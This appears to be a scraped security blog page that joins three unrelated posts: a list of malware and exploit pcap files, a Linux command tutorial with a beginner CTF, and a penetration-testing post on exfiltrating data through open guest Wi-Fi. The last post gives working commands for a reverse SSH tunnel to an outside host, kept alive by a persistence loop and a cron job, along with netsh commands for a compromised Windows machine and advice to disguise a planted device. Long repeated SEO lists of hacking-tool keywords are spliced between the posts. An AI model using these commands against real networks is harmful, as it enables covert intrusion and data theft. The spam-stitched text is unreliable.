Collection Of Pcap Files From Malware Analysis

Update: Feb 19. 2015

We have been adding pcaps to the collection so remember to check out the folder ( Pcap collection) for the recent pcaps.

I had a project to test some malicious and exploit pcaps and collected a lot of them (almost 1000) from various public sources. You can see them in the PUBLIC folder. The credits go to the authors of the pcaps listed in the name of each file. Please visit their blogs and sites to see more information about the pcaps, see their recent posts, and send them thanks. The public pcaps have no passwords on them.




Update:Dec 13. 2014 

Despite rare updates of this post, we have been adding pcaps to the collection so remember to check out the folder ( Pcap collection (New link)) for the recent pcaps!

Update:Dec 31. 2013 - added new pcaps

I did some spring cleaning yesterday and came up with these malware and exploit pcaps. Such pcaps are very useful for IDS and signature testing and development, general education, and malware identification. While there are some online public sandboxes offering pcaps for download like Cuckoo or Anubis but  looking for them is a tedious task and you cannot be totally sure the pcap is for the malware family supposedly analysed - in other words, if the sandbox says it is Zeus does not necessarily mean that it is.

I found some good pcap repositories here (http://www.netresec.com/?page=PcapFiles) but there are very few pcaps from malware.

These are from identified and verified (to the best of my knowledge and belief - email me if you find errors) malware samples.

All of them show the first stage with the initial callback and most have the DNS requests as well. A few pcaps show extended malware runs (e.g. purplehaze pcap is over 500mb).
Most pcaps are mine, a few are from online sandboxes, and one is borrowed from malware.dontneedcoffee.com. That said, I can probably find the corresponding samples for all that have MD5 listed if you really need them. Search contagio, some are posted with the samples.

Each file has the following naming convention:
BIN [RTF, PDF] - the filetype of the dropper used, malware family name, MD5, and year+month of the malware analysis.

I will be adding more pcaps in the future. Please donate your pcaps from identified samples, I am sure many of you have.

Thank you

Download

Download all together or separately.

All pcaps archives have the same password (same scheme), email me if you need it. I tried posting it without any passwords and pass infected but they get flagged as malware. Modern AV rips though zips and zips with the pass 'infected' with ease.

APT PCAPS

Download all together or separately.

1. 2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap
2. 2013-09-08 BIN_TrojanPage_86893886C7CBC7310F7675F4EFDE0A29-pcap
3. 2013-09-08 BIN_Darkcomet_DC98ABBA995771480AECF4769A88756E-pcap
4. 2013-09-02 8202_tbd_ 6D2C12085F0018DAEB9C1A53E53FD4D1-pcap
5. 2013-09-02 BIN_8202_6d2c12085f0018daeb9c1a53e53fd4d1-pcap
6. 2013-09-02 BIN_Vidgrab_6fd868e68037040c94215566852230ab-pcap
7. 2013-09-02 BIN_PlugX_2ff2d518313475a612f095dd863c8aea-pcap
8. 2013-09-02 BIN_Taidoor_46ef9b0f1419e26f2f37d9d3495c499f-pcap
9. 2013-09-02 BIN_Vidgrab_660709324acb88ef11f71782af28a1f0-pcap
10. 2013-09-02 BIN_Gh0st-gif_f4d4076dff760eb92e4ae559c2dc4525-pcap.zip
11. 2013-07-15 BIN_Taleret.E_5328cfcb46ef18ecf7ba0d21a7adc02c.pcap
12. 2013-05-14 BIN_Mediana_0AE47E3261EA0A2DBCE471B28DFFE007_2012-10.pcap
13. 2013-05-14 BIN_Hupigon_8F90057AB244BD8B612CD09F566EAC0C
14. 2013-05-14 BIN_LetsGo_yahoosb_b21ba443726385c11802a8ad731771c0_2011-07-19
15. 2013-05-13 BIN_IXESHE_0F88D9B0D237B5FCDC0F985A548254F2-2013-05-pcap
16. 2013-05-06 BIN_DNSWatch_protux_4F8A44EF66384CCFAB737C8D7ADB4BB8_2012-11-pcap
17. 2013-05-06 BIN_9002_D4ED654BCDA42576FDDFE03361608CAA_2013-01-30-pcap
18. 2013-05-06 BIN_BIN_RssFeeder_68EE5FDA371E4AC48DAD7FCB2C94BAC7-2012-06-pcap (not a common name, see the traffic ssheet http://bit.ly/maltraffic )
19. 2013-04-30 BIN_MSWab_Yayih_FD1BE09E499E8E380424B3835FC973A8_us-pcap
20. 2013-04-29 BIN_LURK_AF4E8D4BE4481D0420CCF1C00792F484_20120-10-pcap
21. 2013-04-29 BIN_XTremeRAT_DAEBFDED736903D234214ED4821EAF99_2013-04-13-pcap
22. BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap
23. BIN_Gh0st_variant-v2010_B1D09374006E20FA795B2E70BF566C6D_2012-08.pcap
24. BIN_Likseput_E019E37F19040059AB5662563F06B609_2012-10.pcap
25. BIN_Nettravler_1f26e5f9b44c28b37b6cd13283838366.pcap
26. BIN_Nettravler_DA5832657877514306EDD211DEF61AFE_2012-10.pcap
27. BIN_Sanny-Daws_338D0B855421867732E05399A2D56670_2012-10.pcap
28. BIN_Sofacy_a2a188cbf74c1be52681f998f8e9b6b5_2012-10.pcap
29. BIN_Taidoor_40D79D1120638688AC7D9497CC819462_2012-10.pcap
30. BIN_TrojanCookies_840BD11343D140916F45223BA05ABACB_2012_01.pcap
31. PDF_CVE-2011-2462_Pdf_2011-12.pcap
32. RTF_Mongall_Dropper_Cve-2012-0158_C6F01A6AD70DA7A554D48BDBF7C7E065_2013-01.pcap
33. OSX_DocksterTrojan.pcap

CRIMEWARE PCAPS

Download all together or separately.

1. 2013-11-12_BIN_ChePro_2A5E5D3C536DA346849750A4B8C8613A-1.pcap
2. 2013-10-15_BIN_cryptolocker_9CBB128E8211A7CD00729C159815CB1C.pcap
3. 2013-09-20_BIN_Lader-dlGameoverZeus_12cfe1caa12991102d79a366d3aa79e9.pcap
4. 2013-09-08 BIN_Tijcont_845B0945D5FE0E0AAA16234DC21484E0-pcap
5. 2013-09-08 BIN_Kelihos_C94DC5C9BB7B99658C275B7337C64B33-pcap.zip
6. 2013-08-19 BIN_Nitedrem_508af8c499102ad2ebc1a83fdbcefecb-pcap
7. 2013-08-17 BIN_sality_CEAF4D9E1F408299144E75D7F29C1810-pcap
8. 2013-08-15 BIN_torpigminiloader-pcap.zip
9. 2013-13-08 EK_popads_109.236.80.170_2013-08-13.pcap
10. 2013-11-08 BIN_Alinav5.3_4C754150639AA3A86CA4D6B6342820BE.pcap
11. 2013-08-08 BIN_BitcoinMiner_F865C199024105A2FFDF5FA98F391D74-pcap
12. 2013-08-07 BIN_ZeroAccess_Sirefef_C2A9CCC8C6A6DF1CA1725F955F991940_2013-08-pcap
13. 2013-07-05 BIN_Kuluoz-Asprox_9F842AD20C50AD1AAB41F20B321BF84B
14. 2013-05-31 Wordpress-Mutopy_Symmi_20A6EBF61243B760DD65F897236B6AD3-2pcap.pcap
15. 2013-05-15 BIN_Zeus_b1551c676a54e9127cd0e7ea283b92cc-2012-04.pcap
16. 2013-05-15 BIN_Gypthoy_3EE49121300384FF3C82EB9A1F06F288-2013-05.pcap
17. 2013-05-12 BIN_PassAlert_B4A1368515C6C39ACEF63A4BC368EDB2-2013-05-13
18. 2013-05-12 BIN_HorstProxy_EFE5529D697174914938F4ABF115F762-2013-05-13-pcap
19. 2013-05-12 BIN_Bitcoinminer_12E717293715939C5196E604591A97DF-2013-05-12-pcap
20. 2013-05-07 BIN_ZeroAccess_Sirefef_29A35124ABEAD63CD8DB2BBB469CBC7A_2013-05-pcapc
21. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
22. 2013-05-05 BIN_GameThief_ECBA0FEB36F9EF975EE96D1694C8164C_2013-03-pcap
23. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
24. 2013-04-27 EK_BIN_Blackhole_leadingto_Medfos_0512E73000BCCCE5AFD2E9329972208A_2013-04-pcap
25. 2013-04-26 -- BIN_Citadel_3D6046E1218FB525805E5D8FDC605361-2013-04-samp 
26. BIN_CitadelPacked_2012-05.pcap
27. BIN_CitadelUnpacked_2012-05.pcap
28. BIN_Cutwail_284Fb18Fab33C93Bc69Ce392D08Fd250_2012-10.pcap
29. BIN_Darkmegi_2012-04.pcap
30. BIN_DarknessDDoS_v8g_F03Bc8Dcc090607F38Ffb3A36Ccacf48_2011-01.pcap-
31. BIN_dirtjumper_2011-10.pcap
32. BIN_DNSChanger_2011-12.pcap
33. BIN_Drowor_worm_0f015bb8e2f93fd7076f8d178df2450d_2013-04.pcap
34. BIN_Googledocs_macadocs_2012-12.pcap
35. BIN_Imaut_823e9bab188ad8cb30c14adc7e67066d.pcap
36. BIN_IRCbot_c6716a417f82ccedf0f860b735ac0187_2013-04.pcap
37. BIN_Kelihos_aka_Nap_0feaaa4adc31728e54b006ab9a7e6afa.pcap
38. BIN_LoadMoney_MailRu_dl_4e801b46068b31b82dac65885a58ed9e_2013-04 .pcap
39. BIN_purplehaze-2012-01.pcap
40. BIN_ponyloader_470a6f47de43eff307a02f53db134289.pcap
41. BIN_Ramnitpcap_2012-01.pcap
42. BIN_Reedum_0ca4f93a848cf01348336a8c6ff22daf_2013-03.pcap
43. BIN_SpyEye_2010-02.pcap
44. BIN_Stabuniq_F31B797831B36A4877AA0FD173A7A4A2_2012-12.pcap
45. BIN_Tbot_23AAB9C1C462F3FDFDDD98181E963230_2012-12.pcap
46. BIN_Tbot_2E1814CCCF0C3BB2CC32E0A0671C0891_2012-12.pcap
47. BIN_Tbot_5375FB5E867680FFB8E72D29DB9ABBD5_2012-12.pcap
48. BIN_Tbot_A0552D1BC1A4897141CFA56F75C04857_2012-12.pcap
49. BIN_Tbot_FC7C3E087789824F34A9309DA2388CE5_2012-12.pcap
50. BIN_Tinba_2012-06.pcap
51. BIN_Vobfus_634AA845F5B0B519B6D8A8670B994906_2012-12.pcap
52. BIN_Xpaj_2012-05.pcap
53. BIN_ZeroAccess_3169969E91F5FE5446909BBAB6E14D5D_2012-10.pcap
54. BIN_ZeusGameover_2012-02.pcap
55. BIN_Zeus_2010-12.pcap
56. EK_Blackholev1_2012-03.pcap
57. EK_Blackholev1_2012-08.pcap
58. EK_Blackholev2_2012-09.pcap
59. EK_Blackhole_Java_CVE-2012-4681_2012-08.pcap
60. EK_Phoenix_2012-04.pcap
61. EK_Smokekt150(Malwaredontneedcoffee)_2012-09.pcap -  credit malware.dontneedcoffee.com

Continue reading

• Hack Tools
• Hack Tools For Mac
• Hacker
• Hacker Tools For Windows
• Hacking Tools For Windows Free Download
• Pentest Tools Kali Linux
• Hacker Search Tools
• Hacker Tools 2020
• Hacking Tools For Windows 7
• Pentest Reporting Tools
• Pentest Tools Website Vulnerability
• Hacking Apps
• Nsa Hack Tools Download
• Hacker Tools
• Hacking Tools For Beginners
• Hack Tools For Games
• Blackhat Hacker Tools
• Hacks And Tools
• Pentest Tools Website
• Pentest Tools For Windows
• Hackers Toolbox
• Hack Tool Apk No Root
• Pentest Tools Website Vulnerability
• Hak5 Tools
• Hacker Tools Linux
• Physical Pentest Tools
• Kik Hack Tools
• Hacking Tools Usb
• Hacking Tools 2019
• What Are Hacking Tools
• Pentest Tools
• Hacker Techniques Tools And Incident Handling
• Hackers Toolbox
• Pentest Tools Review
• Hacker Tools
• Hack Tools For Windows
• Bluetooth Hacking Tools Kali
• Hacking Tools 2019
• Hack Rom Tools
• Hacking Tools For Windows Free Download
• Hacker Tools List
• Pentest Tools Android
• How To Make Hacking Tools
• Hack Tools
• Hacks And Tools
• Pentest Tools Alternative
• Nsa Hack Tools Download
• Hacking Tools Hardware
• Pentest Tools Website Vulnerability
• Hacking Tools Windows
• Hacking Tools For Games
• Hacker Tool Kit
• Hacker Tools
• Pentest Tools Linux
• Hacker Tools For Ios
• Termux Hacking Tools 2019
• Hacker Tools For Pc
• Pentest Tools Free
• Hack Tools For Pc
• Hack Tools Online
• Tools Used For Hacking
• Hacker Tools Linux
• World No 1 Hacker Software
• Pentest Tools Android
• Hacking Tools 2019
• Hacker Security Tools
• Growth Hacker Tools
• Hack Tools For Ubuntu
• Pentest Recon Tools
• Hacking Tools For Windows
• Hacking Tools Windows
• Hacking Tools Usb
• Hacker Tools For Pc
• Pentest Tools Bluekeep
• Growth Hacker Tools
• Pentest Tools Nmap
• Hack Tools For Ubuntu
• Pentest Tools Download
• Hacker Tools Free
• Top Pentest Tools
• Kik Hack Tools
• Hacker Tools Mac
• Hacks And Tools
• Hacking Tools Name
• Game Hacking
• Hacker Tools Online
• Pentest Tools List
• Hacker Tools Mac
• Blackhat Hacker Tools
• Hacking Tools 2020
• Hack Tool Apk
• Hacker Tools Free
• Pentest Tools Port Scanner
• Underground Hacker Sites

Linux Command Line Hackery Series - Part 3

Welcome back, hope you are enjoying this series, I don't know about you but I'm enjoying it a lot. This is part 3 of the series and in this article we're going to learn some new commands. Let's get started

Command: w
Syntax:      w
Function:   This simple function is used to see who is currently logged in and what they are doing, that is, their processes.

Command:  whoami
Syntax:       whoami
Function: This is another simple command which is used to print  the  user  name  associated  with the current effective user ID.

Try it and it will show up your user name.

If you want to know information about a particular user no matter whether it is you or someone else there is a command for doing that as well.

Command: finger
Syntax:      finger [option] [username]
Function:   finger is a user information lookup program. The [] around the arguments means that these arguments are optional this convention is used everywhere in this whole series.

In order to find information about your current user you can simply type:

finger username

Here username is your current username.
To find information about root you can type:

finger root

and it will display info about root user.

Command: uname
Syntax:      uname [options]
Function:   uname is used to display information about the system.

uname is mostly used with the flag -a, which means display all information like this:

uname -a

Command: df
Syntax:      df [option] [FILE ...] 
Function:   df is used to display the amount of space available.
If you type df in your terminal and then hit enter you'll see the used and available space of every drive currently mounted on the system. However the information is displayed in block-size, which is not so much human friendly. But don't worry we can have a human friendly output as well using df by typing:

df -h

the -h flag is used to display the used and available space in a more user friendly format.
We can also view the info of a single drive by specifying the drive name after df like this:

df -h /dev/sda2

That's it for now about df, let's move on.

Command:  free
Syntax:       free [options]
Function:    free is used to display the amount of free and used physical memory and swap memory in the system.
Again the displayed information is in block-size to get a more human readable format use the -h flag like this:

free -h

Command: cal
Syntax:      cal [options]
Function:    cal stands for calendar. It is used to display the calendar.

If you want to display current date on the calendar you can simply type:

cal

and wohooo! you get a nice looking calendar on screen with current date marked but what if you want to display calendar of a previous month well you can do that as well. Say you want to display calendar of Jan 2010, then you'll have to type:

cal -d 2010-01

Nice little handy tool, isn't it?

Command: file
Syntax:      file filename ...
Function:   file is an awesome tool, it's used to classify a file. It is used to determine the file type.

Let's demonstrate the usage of this command by solving a Noob's CTF challenge using file and base64 commands. We'll talk about base64 command in a bit. Go to InfoSecInstitute CTF Website. What you need to do here is to save the broken image file on your local computer in your home directory. After saving the file open your terminal (if it isn't already). Move to your home directory and then check what type of file it is using the file command:

cd
file image.jpg

Shocking output? The file command has identified the above file as an ASCII text file which means the above file is not an image file rather it is a text file now it's time to see it's contents so we'll type:

cat image.jpg

What is that? It's some kind of gibberish. Well it's base64 encoded text. We need to decode it. Let's learn how to do that.

Command: base64
Syntax:       base64 [option] FILE ...
Function:    base64 command is used to encode/decode data and then print it to stdout.

If we're to encode some text in base64 format we'd simply type base64 hit enter and then start typing the text in the terminal after you're done hit enter again and then press CTRL+D like this:

base64
some text here
<CTRL+D>
c29tZSB0ZXh0IGhlcmUK        # output - the encoded string

But in the above CTF we've got base64 encoded data we need to decode it, how are we going to do that? It's simple:

base64 -d image.jpg

There you go you've captured the flag.
The -d flag here specifies that we want to decode instead of encode and after it is the name of file we want to decode.

Voila!
So now you're officially a Hacker! Sorry no certificates available here :)

That's it for this article meet ya soon in the upcoming article.

Related links

1. What Are Hacking Tools
2. Hacker Tools Software
3. Pentest Tools Website
4. Pentest Tools Apk
5. Pentest Tools Url Fuzzer
6. Hacker Tools Free
7. Pentest Tools Tcp Port Scanner
8. Pentest Tools Url Fuzzer
9. Hacker
10. Game Hacking
11. Easy Hack Tools
12. Hack Rom Tools
13. Android Hack Tools Github
14. Hack Tools Download
15. Hacking Tools Windows
16. Hack Tools Download
17. Hacker Tools Github
18. Hacker Tools For Windows
19. Pentest Tools
20. Hacker Tools For Ios
21. Pentest Tools Nmap
22. Pentest Tools Apk
23. Hacking Tools For Windows 7
24. Pentest Tools Linux
25. Hacker Search Tools
26. Hacking Apps
27. Android Hack Tools Github
28. Free Pentest Tools For Windows
29. Hacker Tool Kit
30. Hacker Tools Linux
31. Hacking Tools For Beginners
32. Hacker Security Tools
33. Hacker Tools For Pc
34. Hack Tools For Windows
35. Pentest Tools Website
36. Pentest Tools Free
37. Hacking Tools Mac
38. Hacking Tools Pc
39. Hak5 Tools
40. Hacker Tools Online
41. Hak5 Tools
42. Hack Tools Download
43. Nsa Hack Tools
44. Beginner Hacker Tools
45. Hack Tools Download
46. Hacker Tools
47. Hacker Tools For Mac
48. Underground Hacker Sites
49. Hacking Tools 2019
50. Hacker Tools For Pc
51. Nsa Hack Tools Download
52. Hacker Tools List
53. Hacker Security Tools
54. Nsa Hack Tools Download
55. Pentest Tools Download
56. How To Install Pentest Tools In Ubuntu
57. Underground Hacker Sites
58. Hacker Techniques Tools And Incident Handling
59. Android Hack Tools Github
60. Hacking Tools
61. Pentest Tools Url Fuzzer
62. Hacker Tools For Ios
63. Hack Tools Online
64. Hack Tool Apk No Root
65. Hacker Tools 2020
66. Hacker Tools For Mac
67. Pentest Tools Windows
68. Pentest Tools Free
69. Pentest Tools Tcp Port Scanner
70. Hacking Tools For Windows
71. Hack Tool Apk No Root
72. Hacking Tools For Windows
73. Pentest Tools List
74. Pentest Tools Kali Linux
75. Hacking Tools Pc
76. Best Hacking Tools 2019
77. Pentest Tools Subdomain
78. Pentest Tools Github
79. Hacking Tools For Pc
80. Pentest Tools Tcp Port Scanner
81. Hacking Tools Name
82. How To Hack
83. Growth Hacker Tools
84. Hack Tools Download
85. Hacker Tools Github
86. Game Hacking
87. Hacker Tools List
88. Hacker Techniques Tools And Incident Handling
89. Pentest Tools Alternative
90. Hack Tools Online
91. Tools For Hacker
92. Hack Tool Apk No Root
93. Pentest Box Tools Download
94. Pentest Tools Bluekeep
95. Easy Hack Tools
96. Hacking Tools For Beginners
97. Pentest Tools Find Subdomains
98. What Are Hacking Tools
99. Pentest Tools Port Scanner
100. Black Hat Hacker Tools
101. Hacking Tools For Pc
102. How To Install Pentest Tools In Ubuntu
103. Pentest Tools For Android
104. Hack Tools For Pc
105. Physical Pentest Tools
106. Hacking Tools For Windows 7
107. Hacking Tools Name
108. Hak5 Tools
109. Pentest Tools For Android
110. Hacker Tools Apk
111. Pentest Tools For Ubuntu
112. Hacking Tools Windows
113. Hack Tools Download
114. Hacker Tools Online
115. Pentest Tools Framework
116. Hacking Tools Pc
117. Pentest Tools Windows
118. Hackrf Tools
119. Hack Tools 2019
120. New Hack Tools
121. Pentest Tools Subdomain
122. Pentest Tools Framework
123. Hacking Tools Software
124. Hacker Search Tools
125. Hacker Tools Free
126. Tools For Hacker
127. Hacker Tools Linux
128. Hacking Tools Hardware
129. Hack Tool Apk No Root
130. Pentest Tools Alternative
131. Pentest Tools For Android
132. Pentest Tools Url Fuzzer
133. Hack Tools For Pc
134. Hack Tools For Ubuntu
135. Hacking Tools Free Download
136. Hacker Tools Github
137. Hacker Tools For Mac
138. Hack Tools Pc

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi

Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

Related news

• Hacking Tools 2019
• Pentest Tools Kali Linux
• Hacking Tools For Windows
• Pentest Box Tools Download
• Free Pentest Tools For Windows
• Hack Tool Apk
• Pentest Tools Find Subdomains
• Hacking Tools 2020
• Hacking Tools Download
• Hacker Tools For Ios
• Hacker Tools List
• Install Pentest Tools Ubuntu
• Android Hack Tools Github
• Hacking Tools 2019
• Hack App
• Hack Tools Online
• Pentest Tools Windows
• New Hack Tools
• Bluetooth Hacking Tools Kali
• Hack App
• Hack Tools
• Pentest Tools Framework
• Hacking Tools Download
• Hacker Tools Free Download
• Pentest Tools Free
• Pentest Tools Linux
• Nsa Hack Tools
• Pentest Tools Online
• Hack Apps
• Pentest Automation Tools
• Hacking Tools Software
• Hack Tools For Ubuntu
• How To Make Hacking Tools
• Hacking Tools Software
• Hacker Tools Online
• Kik Hack Tools
• Hack Tools For Pc
• Game Hacking
• Hacker Techniques Tools And Incident Handling
• What Is Hacking Tools
• Android Hack Tools Github
• Hacking Tools 2020
• Hacker Tools List
• Pentest Recon Tools
• Hack Tool Apk No Root
• Termux Hacking Tools 2019
• Pentest Tools Github
• Hack And Tools
• Hacking Tools Mac
• Kik Hack Tools
• Pentest Tools Subdomain
• Pentest Tools Bluekeep
• Pentest Tools For Windows
• Pentest Tools Windows
• Hak5 Tools
• Pentest Tools Github
• Blackhat Hacker Tools
• Hacking Tools Free Download
• Kik Hack Tools
• Pentest Tools Port Scanner
• What Are Hacking Tools
• Hack Tool Apk No Root
• Hack Tools For Ubuntu
• Hacker Tool Kit
• How To Hack
• Pentest Tools Windows
• Pentest Tools For Ubuntu
• Android Hack Tools Github
• Hack Rom Tools
• Hacker Search Tools
• Pentest Tools Open Source
• Hacking Tools 2020
• Hacking Tools Download
• Pentest Tools Website
• Pentest Tools Apk
• What Are Hacking Tools
• Pentest Tools For Mac
• Hacker Hardware Tools
• Pentest Tools
• Tools For Hacker
• Hackrf Tools
• Hacking Tools Windows 10
• Top Pentest Tools
• Hack Tools 2019
• Android Hack Tools Github
• Hacker Tools 2020
• Hacking Tools For Games
• Hack Tools For Mac
• Pentest Tools Apk
• Nsa Hacker Tools
• Pentest Tools For Ubuntu
• Hacking Tools Hardware
• Pentest Tools Tcp Port Scanner
• How To Install Pentest Tools In Ubuntu
• Hacking Tools Free Download
• Hacking Apps
• Black Hat Hacker Tools
• Install Pentest Tools Ubuntu
• Pentest Automation Tools
• Pentest Tools
• Hacking Tools Hardware
• How To Install Pentest Tools In Ubuntu
• What Are Hacking Tools
• Hacking Tools 2020
• Hacking Tools For Windows Free Download
• Hacker Tools Linux
• Ethical Hacker Tools
• Hacker Search Tools
• Android Hack Tools Github
• Tools For Hacker
• Hack Tool Apk